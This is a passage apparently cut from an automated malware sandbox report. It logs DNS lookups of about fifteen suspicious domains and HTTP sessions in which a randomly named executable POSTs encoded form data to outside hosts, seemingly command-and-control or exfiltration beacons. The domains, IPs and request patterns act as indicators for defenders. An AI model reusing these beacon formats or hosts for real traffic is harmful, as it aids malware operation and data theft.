                                                                                                                              Oct 7, 2024 12:36:29.376260996 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:29.376293898 CEST8050042162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:29.376312017 CEST5004280192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:29.376358986 CEST5004280192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:30.289377928 CEST5004280192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.307959080 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.360162020 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.360235929 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.367244005 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.372136116 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961532116 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961568117 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961584091 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961601973 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961621046 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961637020 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.961637020 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.961724043 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961795092 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961818933 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.961944103 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961960077 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.961977005 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:31.962011099 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.962028980 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.966314077 CEST5004380192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:31.973546982 CEST8050043162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:37.018769026 CEST5004480192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:37.023794889 CEST80500448.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:37.023870945 CEST5004480192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:37.032697916 CEST5004480192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:37.037635088 CEST80500448.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:37.921485901 CEST80500448.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:37.921535015 CEST80500448.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:37.921581984 CEST5004480192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:38.542404890 CEST5004480192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:39.558005095 CEST5004580192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:39.563879013 CEST80500458.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:39.563962936 CEST5004580192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:39.576016903 CEST5004580192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:39.581079960 CEST80500458.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:40.465425968 CEST80500458.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:40.465482950 CEST80500458.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:40.470406055 CEST5004580192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:41.086178064 CEST5004580192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:42.106415033 CEST5004680192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:42.111686945 CEST80500468.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:42.117398977 CEST5004680192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:42.126420975 CEST5004680192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:42.131534100 CEST80500468.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:42.131601095 CEST80500468.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:43.034208059 CEST80500468.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:43.034857035 CEST80500468.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:43.038469076 CEST5004680192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:43.633052111 CEST5004680192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:44.651459932 CEST5004780192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:44.656769037 CEST80500478.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:44.658483982 CEST5004780192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:44.664339066 CEST5004780192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:36:44.669388056 CEST80500478.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:37:06.037329912 CEST80500478.217.17.192192.168.2.6
                                                                                                                              Oct 7, 2024 12:37:06.037448883 CEST5004780192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:37:06.075138092 CEST5004780192.168.2.68.217.17.192
                                                                                                                              Oct 7, 2024 12:37:06.082200050 CEST80500478.217.17.192192.168.2.6
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Oct 7, 2024 12:33:29.907469034 CEST6502953192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:33:29.933248997 CEST53650291.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:45.463882923 CEST5662853192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:33:46.244936943 CEST53566281.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:33:59.886643887 CEST6168653192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:33:59.905442953 CEST53616861.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:13.420811892 CEST5305353192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:34:13.439279079 CEST53530531.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:27.464713097 CEST5106053192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:34:27.478151083 CEST53510601.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:40.732362032 CEST5191353192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:34:40.946930885 CEST53519131.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:54.214430094 CEST5201353192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:34:54.239947081 CEST53520131.1.1.1192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:07.526848078 CEST5636153192.168.2.61.1.1.1
                                                                                                                              Oct 7, 2024 12:35:07.541565895 CEST53563611.1.1.1192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 7, 2024 12:33:29.907469034 CEST | 192.168.2.6 | 1.1.1.1 | 0x2d93 | Standard query (0) | www.whiterabbitgroup.pro | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:33:45.463882923 CEST | 192.168.2.6 | 1.1.1.1 | 0x87fc | Standard query (0) | www.wonders8.live | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:33:59.886643887 CEST | 192.168.2.6 | 1.1.1.1 | 0xa405 | Standard query (0) | www.golizle22.xyz | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:34:13.420811892 CEST | 192.168.2.6 | 1.1.1.1 | 0x4ffe | Standard query (0) | www.impulsarnegocios.info | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:34:27.464713097 CEST | 192.168.2.6 | 1.1.1.1 | 0xf8c1 | Standard query (0) | www.nieuws-july202541.sbs | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:34:40.732362032 CEST | 192.168.2.6 | 1.1.1.1 | 0x93a5 | Standard query (0) | www.acuarelacr.buzz | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:34:54.214430094 CEST | 192.168.2.6 | 1.1.1.1 | 0x4342 | Standard query (0) | www.booosted.xyz | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:35:07.526848078 CEST | 192.168.2.6 | 1.1.1.1 | 0xbc93 | Standard query (0) | www.gegeesthreadworks.info | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:35:20.671493053 CEST | 192.168.2.6 | 1.1.1.1 | 0x7b13 | Standard query (0) | www.sellvolt.life | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:35:34.784984112 CEST | 192.168.2.6 | 1.1.1.1 | 0xdcd8 | Standard query (0) | www.kk88.live | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:35:48.482403040 CEST | 192.168.2.6 | 1.1.1.1 | 0x5f3 | Standard query (0) | www.cablecarrental.net | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:36:01.636467934 CEST | 192.168.2.6 | 1.1.1.1 | 0xb55e | Standard query (0) | www.o30cf998d.cfd | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:36:09.713977098 CEST | 192.168.2.6 | 1.1.1.1 | 0x5796 | Standard query (0) | www.kuaimaolife.shop | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:36:23.652781010 CEST | 192.168.2.6 | 1.1.1.1 | 0xa589 | Standard query (0) | www.nieuws-july202491.sbs | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:36:36.980202913 CEST | 192.168.2.6 | 1.1.1.1 | 0xfcaf | Standard query (0) | www.meliorahomes.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 7, 2024 12:33:29.933248997 CEST | 1.1.1.1 | 192.168.2.6 | 0x2d93 | No error (0) | www.whiterabbitgroup.pro | whiterabbitgroup.pro |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 12:33:29.933248997 CEST | 1.1.1.1 | 192.168.2.6 | 0x2d93 | No error (0) | whiterabbitgroup.pro |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:33:29.933248997 CEST | 1.1.1.1 | 192.168.2.6 | 0x2d93 | No error (0) | whiterabbitgroup.pro |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:33:46.244936943 CEST | 1.1.1.1 | 192.168.2.6 | 0x87fc | No error (0) | www.wonders8.live | wonders8.live |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 12:33:46.244936943 CEST | 1.1.1.1 | 192.168.2.6 | 0x87fc | No error (0) | wonders8.live |  | 119.18.54.27 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:33:59.905442953 CEST | 1.1.1.1 | 192.168.2.6 | 0xa405 | No error (0) | www.golizle22.xyz |  | 104.21.5.125 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:33:59.905442953 CEST | 1.1.1.1 | 192.168.2.6 | 0xa405 | No error (0) | www.golizle22.xyz |  | 172.67.133.115 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:34:13.439279079 CEST | 1.1.1.1 | 192.168.2.6 | 0x4ffe | No error (0) | www.impulsarnegocios.info | impulsarnegocios.info |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 12:34:13.439279079 CEST | 1.1.1.1 | 192.168.2.6 | 0x4ffe | No error (0) | impulsarnegocios.info |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:34:13.439279079 CEST | 1.1.1.1 | 192.168.2.6 | 0x4ffe | No error (0) | impulsarnegocios.info |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:34:27.478151083 CEST | 1.1.1.1 | 192.168.2.6 | 0xf8c1 | No error (0) | www.nieuws-july202541.sbs | nieuws-july202541.sbs |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 12:34:27.478151083 CEST | 1.1.1.1 | 192.168.2.6 | 0xf8c1 | No error (0) | nieuws-july202541.sbs |  | 162.0.215.33 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:34:40.946930885 CEST | 1.1.1.1 | 192.168.2.6 | 0x93a5 | No error (0) | www.acuarelacr.buzz |  | 161.97.168.245 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:34:54.239947081 CEST | 1.1.1.1 | 192.168.2.6 | 0x4342 | No error (0) | www.booosted.xyz | booosted.xyz |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 12:34:54.239947081 CEST | 1.1.1.1 | 192.168.2.6 | 0x4342 | No error (0) | booosted.xyz |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:34:54.239947081 CEST | 1.1.1.1 | 192.168.2.6 | 0x4342 | No error (0) | booosted.xyz |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:35:07.541565895 CEST | 1.1.1.1 | 192.168.2.6 | 0xbc93 | No error (0) | www.gegeesthreadworks.info | gegeesthreadworks.info |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 12:35:07.541565895 CEST | 1.1.1.1 | 192.168.2.6 | 0xbc93 | No error (0) | gegeesthreadworks.info |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:35:07.541565895 CEST | 1.1.1.1 | 192.168.2.6 | 0xbc93 | No error (0) | gegeesthreadworks.info |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:35:21.335228920 CEST | 1.1.1.1 | 192.168.2.6 | 0x7b13 | No error (0) | www.sellvolt.life |  | 209.74.64.190 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:35:34.880687952 CEST | 1.1.1.1 | 192.168.2.6 | 0xdcd8 | No error (0) | www.kk88.live | kk88.live |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 12:35:34.880687952 CEST | 1.1.1.1 | 192.168.2.6 | 0xdcd8 | No error (0) | kk88.live |  | 68.178.233.113 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:35:48.496912003 CEST | 1.1.1.1 | 192.168.2.6 | 0x5f3 | No error (0) | www.cablecarrental.net | cablecarrental.net |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 12:35:48.496912003 CEST | 1.1.1.1 | 192.168.2.6 | 0x5f3 | No error (0) | cablecarrental.net |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:35:48.496912003 CEST | 1.1.1.1 | 192.168.2.6 | 0x5f3 | No error (0) | cablecarrental.net |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:36:01.652199984 CEST | 1.1.1.1 | 192.168.2.6 | 0xb55e | Name error (3) | www.o30cf998d.cfd | none | none | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:36:10.145410061 CEST | 1.1.1.1 | 192.168.2.6 | 0x5796 | No error (0) | www.kuaimaolife.shop |  | 38.55.251.233 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:36:23.673620939 CEST | 1.1.1.1 | 192.168.2.6 | 0xa589 | No error (0) | www.nieuws-july202491.sbs | nieuws-july202491.sbs |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 12:36:23.673620939 CEST | 1.1.1.1 | 192.168.2.6 | 0xa589 | No error (0) | nieuws-july202491.sbs |  | 162.0.215.33 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 12:36:37.015419006 CEST | 1.1.1.1 | 192.168.2.6 | 0xfcaf | No error (0) | www.meliorahomes.net |  | 8.217.17.192 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49864 | 3.33.130.190 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 12:33:29.953324080 CEST | 512 | OUT | GET /woyi/?An=mLdxo2Y8RLRh&ej6Le=liT4ZvY+2rzgu/UySgm47PML3ORjyZfCr6UpwpMzCweBEUZYpuqhq1mvJHjke4Uqr9Ttl6ktg6VhmA6yP/C42/0uWdACaDjPwlAEpqkr1rm8nQp5jQDy/v7kwBfcS6SUx+7tvUI= HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.whiterabbitgroup.pro
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Oct 7, 2024 12:33:30.413278103 CEST | 413 | IN | HTTP/1.1 200 OK
                                                                                                                              Server: openresty
                                                                                                                              Date: Mon, 07 Oct 2024 10:33:30 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 273
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?An=mLdxo2Y8RLRh&ej6Le=liT4ZvY+2rzgu/UySgm47PML3ORjyZfCr6UpwpMzCweBEUZYpuqhq1mvJHjke4Uqr9Ttl6ktg6VhmA6yP/C42/0uWdACaDjPwlAEpqkr1rm8nQp5jQDy/v7kwBfcS6SUx+7tvUI="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49969 | 119.18.54.27 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 12:33:46.262151957 CEST | 763 | OUT | POST /ctxc/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.wonders8.live
                                                                                                                              Origin: http://www.wonders8.live
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.wonders8.live/ctxc/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=+fLQydoi4CxWqAysIZNDbyamuYq8BV1cXEoWIbwubt2D0t49S1kR5chs88YDhlQePkCT10zTTVQxk1hFydRyxCL6nNDtmjfHclGyIRpuCE91WeXGmSMaqQv85khGIVe49KdwMx1sBa3gtossEG+T/zZ6TAsZRfbfSQFnTBGP5x4ojKMIgKU2g7jzf9r99+mD78LP8ww8YNSc
Oct 7, 2024 12:33:47.257277012 CEST | 643 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:33:47 GMT
                                                                                                                              Server: Apache
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 358
                                                                                                                              Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49987 | 119.18.54.27 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 12:33:48.825151920 CEST | 787 | OUT | POST /ctxc/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.wonders8.live
                                                                                                                              Origin: http://www.wonders8.live
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.wonders8.live/ctxc/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=+fLQydoi4CxWsgCsbuRDQyahg4q8P11YXEkWIfBlb/SD1MI9T0kR6chskMYC+1RQPkOb11PTTVExk0RF1qlxwSL0rtDvoDfHclGyIRtICAR1WNfG0jMbmwvz+khGZFe09KdSMzBCBYfgttQsHTKcxzZ8MQtIZ/StIxURZjKYpW48vcNS85UVyrDxf/zP9emp58zPun8bX53/Svwv9QZ2tiZpIuC2jsvYUw==
Oct 7, 2024 12:33:49.803615093 CEST | 643 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:33:49 GMT
                                                                                                                              Server: Apache
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 358
                                                                                                                              Content-Type: text/html


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              3 | 192.168.2.6 | 49992 | 119.18.54.27 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:33:51.374537945 CEST | 1800 | OUT | POST /ctxc/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.wonders8.live
                                                                                                                              Origin: http://www.wonders8.live
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.wonders8.live/ctxc/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le= [TRUNCATED]
                                                                                                                              Oct 7, 2024 12:33:52.367022038 CEST | 643 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:33:52 GMT
                                                                                                                              Server: Apache
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 358
                                                                                                                              Content-Type: text/html


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              4 | 192.168.2.6 | 49994 | 119.18.54.27 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:33:53.914181948 CEST | 505 | OUT | GET /ctxc/?ej6Le=zdjwxosx+nYBz3+zbsBPWm+/7ve+ekB9VgYRIagILtbm8OwwRgMV6Kxr3Il58QUpA1eFuFbhbn4bqlVkjsdXtj71u+jihQLEfVmONzp8WE9uDtKzy1Bx2zuvnmoFIjKdlKtQFkI=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.wonders8.live
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:33:54.876702070 CEST | 844 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:33:54 GMT
                                                                                                                              Server: Apache
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 583
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              5 | 192.168.2.6 | 49995 | 104.21.5.125 | 80 | 1460 | C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Oct 7, 2024 12:33:59.921257019 CEST | 763 | OUT | POST /kpbt/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.golizle22.xyz
                                                                                                                              Origin: http://www.golizle22.xyz
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.golizle22.xyz/kpbt/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Ascii: ej6Le=Wx6XlLs/CN3f9s1gvDZ72mPuGcKDfYjj7LTDVMvOSUXhbRW6T8JSza2CHK4SIzy0ZK04CTcZXGDgZGngN664Y9+85zyvmmoeGSUyht+zSdZf+1Tl7Zrl/1HOCKf1wb9znIEjLfo+ekkVww0o3Y4lQYB3OJRRvykD18KBA+mo/BzA0YyrhtFQRql0kAVHKydzfPH3SNE4+SKO
                                                                                                                              Oct 7, 2024 12:34:00.756877899 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:00 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LL37YFXTRqAIbPLbXeOE%2FYraQGhB566vXWDUjHGuYJaxdaNdgUuFHNG27XbnLVWYWiOp0qb%2BLnC7wfYIXW2SDAIa7v9hfLKS2%2BIP3L8f4%2FNQbofDeS6lHXze%2Bbj2IkN8iEmETw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ced3c781af6438a-EWR
                                                                                                                              Content-Encoding: gzip
